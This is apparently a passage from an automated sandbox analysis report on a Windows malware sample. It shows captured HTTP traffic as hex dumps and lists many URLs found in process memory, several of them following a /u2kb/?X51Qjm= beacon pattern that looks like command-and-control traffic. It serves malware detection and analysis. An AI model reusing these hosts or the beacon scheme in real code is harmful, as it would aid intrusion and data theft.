68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:52:01 GMTServer: ApacheContent-Length: 4406Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.28expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 16:52:09 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 31 35 62 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 5d 6d 73 db 36 b6 fe 9c cc ec 7f 40 95 49 1d 35 22 45 52 92 e3 c8 b1 77 93 34 9d cd dc e6 26 93 a6 b3 b3 b7 b7 a3 81 48 48 42 4d 12 5c 00 b2 e4 2a da df 7e 07 00 29 82 14 40 d2 ce cb cd da 13 c7 02 1e 9c 73 70 70 f0 00 04 40 f8 d9 77 3f be 7d f9 e1 9f ef 5e 81 bf 7f 78 f3 f3 e5 5f ee 3f 5b f1 24 06 31 4c 97 17 3d 94 3a bf fe d2 93 89 08 46 97 7f b9 7f ef 59 82 38 04 e1 0a 52 86 f8 45 ef d7 0f 3f 39 67 3d 99 c1 31 8f d1 e5 3b b8 44 20 25 1c 2c c8 3a 8d c0 f7 0f ce 02 df 3f 07 1f 56 08 fc 88 af 71 8a c0 fb 75 44 e1 15 5b c1 67 43 55 e4 be 92 99 c2 04 5d 9c 50 32 27 9c 9d 80 90 a4 1c a5 fc e2 24 81 5b 07 27 70 89 9c 8c a2 6b 8c 36 d3 18 d2 25 3a 01 c3 cb fb cf 62 9c 5e 01 8a e2 8b 93 28 65 02 b0 40 3c 5c 9d 80 15 45 8b 8b 93 e1 90 af 50 24 b5 d2 42 a9 1b 92 a4 5b d9 05 49 39 73 97 84 2c 63 04 33 cc 0c 25 7b 30 e6 88 a6 90 a3 1e e0 37 19 ba e8 c1 2c 8b 71 08 39 26 e9 90 32 f6 78 9b c4 3d 20 ab 79 d1 33 f9 00 7c 4f e1 bf d6 e4 1c fc 84 50 d4 53 ba 7b 2b ce 33 36 b5 59 3f 5c 20 14 0d 7b 5f cc 92 97 24 49 50 ca d9 6d 4c 0a f3 32 ba 6d 65 a3 f6 44 b3 65 84 f2 de a1 59 7b 1b 1c f1 d5 45 84 ae 71 88 1c f9 61 00 70 8a 39 86 b1 c3 42 18 a3 0b bf 57 15 f2 cb 7f fd f3 dd ab d9 87 b7 6f 7f 7e f1 fc bd 26 a9 92 3e 7b f7 fc fd 2f af de cf 5e be 7d f3 ee f9 87 d7 2f 7e 7e 55 93 c2 57 28 41 4e 48 62 42 35 19 0f 16 68 7c 3a 2e 35 66 94 64 88 f2 9b 8b 1e 59 4e a5 d3 34 f0 2d 42 dc 2c 70 4d 63 4d 9c 70 ad dd b3 eb e0 6a 3e 34 8b 89 89 f0 93 26 09 a5 33 d1 5b 4d 58 86 39 9a 09 0f 68 f0 ee 06 8b 88 d2 db 0e cd 85 3c 81 65 fc 26 46 00 47 17 27 1b 42 64 14 d0 10 39 38 8d 71 7a f8 2f 64 ec e4 f2 be ab 01 c0 82 d0 04 b8 e2 a7 43 c9 06 b8 14 fd 6b 8d 29 8a c0 0e 5c 63 86 e7 38 c6 fc 66 aa 7e 8f d1 39 d8 df 7f 36 94 aa 2a fd 56 a6 b0 15 42 fc 44 9a b0 66 8e ec b4 52 63 de 8f 8b c0 35 f5 e6 61 c8 d8 5f 17 30 c1 f1 cd c5 ab f8 f1 1b c4 18 a6 f8 e1 e8 f9 d8 f3 1e 3e 79 f9 2b 9d c3 14 33 9e 27 04 2f 27 f2 e7 a9 e7 7d ff c0 1b 9d 9d 47 98 65 31 bc b9 60 1b 98 a9 94 6b 44 2f 4e 5d df f5 4f 40 82 22 0c 2f 4e 60 1c d7 d9 c6 60 b5 4c aa 5b 6d 8f 89 4d e6 e4 6d 31 94 e1 cc 86 af 93 8c a2 3f a1 a8 90 f2 93 9b e0 d4 15 d5 13 26 9d b9 fe f8 96 16 e9 ad f9 39 ec 22 49 42 52 69 5e 16 af 97 38 65 43 4d c3 Data Ascii: 15bd]ms6@I5"ERw4&HHBM\*~)@spp@w?}^x_?[$1L=:FY8RE?9g=1;D %,:?VquD[
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:52:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:42:34 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 462Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00 Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!
          Source: cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://fonts.googleapis.com/css?family=Open
          Source: explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://justinmezzell.com
          Source: u8QPnVhq0N.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.583702124.00000000161B6000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005C06000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR
          Source: explorer.exe, 00000004.00000002.583702124.0000000015526000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000004F76000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.222ambking.org
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.222ambking.org/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.222ambking.org/u2kb/www.222ambking.org
          Source: explorer.exe, 00000004.00000003.561968971.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.344218674.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.580393358.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avisrezervee.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avisrezervee.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avisrezervee.com/u2kb/www.avisrezervee.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bitservicesltd.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000002.583702124.0000000016024000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.0000000005A74000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.dzyngiri.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com/u2kb/www.employerseervices.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com/u2kb/www.energyservicestation.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online
